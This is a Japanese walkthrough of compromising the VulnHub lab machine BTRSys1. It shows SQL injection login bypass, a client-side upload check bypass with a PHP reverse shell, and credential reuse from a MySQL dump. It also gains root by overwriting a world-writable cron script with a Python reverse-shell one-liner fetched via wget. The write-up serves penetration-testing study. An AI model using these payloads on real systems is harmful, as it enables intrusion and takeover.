vulnhub BTRSys1 雑記
BTRSys1
サービス調査
# nmap -p- 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT Nmap scan report for 10.10.10.12 Host is up (0.00031s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT Nmap scan report for 10.10.10.12 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.2
- [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.7 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.2
# searchsploit vsftp
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
今後もvsfpdは殆ど刺さらなそう
[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
OpenSSH < 6.6 SFTP (x64) - Command Execution | exploits/linux_x86-64/remote/45000.c OpenSSH < 6.6 SFTP - Command Execution | exploits/linux/remote/45001.py
何か刺さりそうな気がしたけど、SFTP無いし、sshのuserが分からん
[port 80] http Apache httpd 2.4.7 (Ubuntu)
# nikto -h 10.10.10.12
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.12
+ Target Hostname: 10.10.10.12
+ Target Port: 80
+ Start Time: 2020-05-08 07:37:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2020-05-08 07:38:28 (GMT-4) (75 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
# dirb http://10.10.10.12
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 9 02:08:34 2020
URL_BASE: http://10.10.10.12/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.12/ ----
==> DIRECTORY: http://10.10.10.12/assets/
+ http://10.10.10.12/index.php (CODE:200|SIZE:758)
==> DIRECTORY: http://10.10.10.12/javascript/
+ http://10.10.10.12/server-status (CODE:403|SIZE:291)
==> DIRECTORY: http://10.10.10.12/uploads/
---- Entering directory: http://10.10.10.12/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.12/javascript/ ----
==> DIRECTORY: http://10.10.10.12/javascript/jquery/
---- Entering directory: http://10.10.10.12/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.12/javascript/jquery/ ----
+ http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879)
+ http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5)
-----------------
END_TIME: Sat May 9 02:08:51 2020
DOWNLOADED: 13836 - FOUND: 4
apacheやphp自体には特に何も無さそう。
色々ディレクトリはあるが目ぼしいものは無く
どう考えても「/uploads/」には怪しさしかないのだが。
config.phpは単純なアクセスじゃ見れない。
login.phpは適当にやっても通らなさそう。
しかし、
# curl 10.10.10.12/login.php
(snip)
<div class="login-box">
<div class="lb-header">
<a href="#" class="active" id="login-box-link">Giris Yap</a>
</div>
<form method="Post" name="loginform" action="personel.php" class="email-login">
<div class="u-form-group">
<input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/>
</div>
<div class="u-form-group">
<input type="password" id="pwd" name="parola" placeholder="Parola" required/>
</div>
<div class="u-form-group">
<input type="button" value="Giris" onclick="control();" />
</div>
</form>
</div>
<script type="text/javascript">
function control(){
var user = document.getElementById("user").value;
var pwd = document.getElementById("pwd").value;
var str=user.substring(user.lastIndexOf("@")+1,user.length);
if((pwd == "'")){
alert("Hack Denemesi !!!");
}
else if (str!="btrisk.com"){
alert("Yanlis Kullanici Bilgisi Denemektesiniz");
}
else{
document.loginform.submit();
}
}
</script>
パスワードにシングルクォーテーションが含まれていると拒否されて、
メールアドレスに「@btrisk.com」が含まれていないと許されないよう。
以上を満たせば、適当な値でログインできるぽい?
その遷移先ページは
# curl 10.10.10.12/personel.php
(snip)
<script type="text/javascript">
// accept=".jpg,.png"
function getFile(){
var filename = document.getElementById("dosya").value;
var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
document.myform.submit();
}else{
//mesaj
alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");
return false;
}
}
</script>
ファイルアップロードスクリプトがある?
スクリプトを動かす、ボタン等が見つからない。
改めて、login.phpへ戻る。
色々ログインを試していたら、「@btrisk.com」の前ならシングルクォーテーションを利用できる。
メールアドレスに「' or '1'='1'-- @btrisk.com」でSQLi通った模様。
SQLiが刺さればログインできたようで、getFile()のボタンを発見。
リバシェphpは、いつものpentestmonkeyのやつ「/usr/share/webshells/php/php-reverse-shell.php」
reverse-shellするphpファイルをアップロードしようとすると「jpg,gif,png」じゃないからダメと言われる。
しかし、画像ファイルじゃないとダメだという判断はjavascriptがサーバ側でなくクライアント側で行っているので、ブラウザのコンソールでgetFile()を弄ってやれば回避可能。
自分の場合、参照にファイルをセットした後、ブラウザのコンソールから「document.myform.submit();」を叩いてやることでuploadした。
さて、アップロードしたファイルはどこにアップロードされるのか。
それはやはり、「/uploads/」に決まっている。
実際、アップロード後に確認して見るとファイルが上がっている。
shell getchu!
window 1 # nc -nlvp 443
window 2 # curl 10.10.10.12/uploads/reverse.php
window 1 Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux 19:00:23 up 11:28, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
他に、「/javascript/」は「Forbidden」だったが、
「/javascript/jquery/jquery」と「/javascript/jquery/version」は何故か200である。
after shell getchu
sqlデータベースにある資格情報の利用
まずは、先ほど見れなかった「config.php」を見に行く。
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@BTRsys1:/var/www/html$ cd /var/www/html/
cd /var/www/html/
www-data@BTRsys1:/var/www/html$ ls
ls
assets gonder.php index.php personel.php uploads
config.php hakkimizda.php login.php sorgu.php
www-data@BTRsys1:/var/www/html$ cat config.php
cat config.php
<?php
/////////////////////////////////////////////////////////////////////////////////////////
$con=mysqli_connect("localhost","root","toor","deneme");
if (mysqli_connect_errno())
{
echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();
}
/////////////////////////////////////////////////////////////////////////////////////////
?>
www-data@BTRsys1:/var/www/html$
まさかmysqlのroot起動によるのroot権限奪取か?
www-data@BTRsys1:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: toor
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 361
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> select sys_exec("id");
select sys_exec("id");
ERROR 1305 (42000): FUNCTION sys_exec does not exist
そんなことは無かったので色々見ていく。
mysql> show database; show database; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1 mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | deneme | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.00 sec) mysql> use information_schema; use information_schema; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_BUFFER_PAGE | | INNODB_TRX | | INNODB_BUFFER_POOL_STATS | | INNODB_LOCK_WAITS | | INNODB_CMPMEM | | INNODB_CMP | | INNODB_LOCKS | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_BUFFER_PAGE_LRU | +---------------------------------------+ 40 rows in set (0.00 sec) mysql> use deneme; use deneme; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +------------------+ | Tables_in_deneme | +------------------+ | user | +------------------+ 1 row in set (0.00 sec) mysql> select * from user; select * from user; +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | 1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 | | 2 | can demir | cdmir@btrisk.com | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ 2 rows in set (0.00 sec) mysql>
これは色々使えそうな情報では?
www-data@BTRsys1:/var/www/html$ su - su - Password: asd123*** root@BTRsys1:~# id id uid=0(root) gid=0(root) groups=0(root)
root shell getchu!!
cronを見た
「find / -perm -2 -type f 2>/dev/null」という面白いコマンドを見つけたので早速使って見る。
www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null find / -perm -2 -type f 2>/dev/null /var/tmp/cleaner.py.swp /var/log/cronlog (snip) /lib/log/cleaner.py
結果は殆どどうでも良いが、面白いものを発見。
「/var/log/cronlog」,「/lib/log/cleaner.py」とは一体何なのだろうか。
www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog
cat /var/log/cronlog
*/2 * * * * cleaner.py
www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py
cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner
ls -al /lib/log/ | grep cleaner
-rwxrwxrwx 1 root root 96 Aug 13 2014 cleaner.py
「clearner.py」を書き換えてやればroot取れる。
今回は以下への書き換えを行う。
#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
「LHOST」と「LPORT」はお好みで。
attacker # python -m SimpleHTTPServer 80
victim www-data@BTRsys1:/var/www/html$ cd /lib/log cd /lib/log www-data@BTRsys1:/lib/log$ cd /tmp cd /tmp www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-09 20:03:17-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: 'getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238] www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py cp ./getroot.py /lib/log/cleaner.py www-data@BTRsys1:/tmp$
attacker (cron待ち) # nc -nlvp 8080 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::8080 Ncat: Listening on 0.0.0.0:8080 Ncat: Connection from 10.10.10.12. Ncat: Connection from 10.10.10.12:56889. /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)
「/tmp」下だと、タイミングが悪いとcleaner.pyに 消される可能性があるので「/var/www/html/uploads」で作業する方が良いかもしれない。
学び
- 「find / -perm -2 -type f 2>/dev/null」は偉大では!?
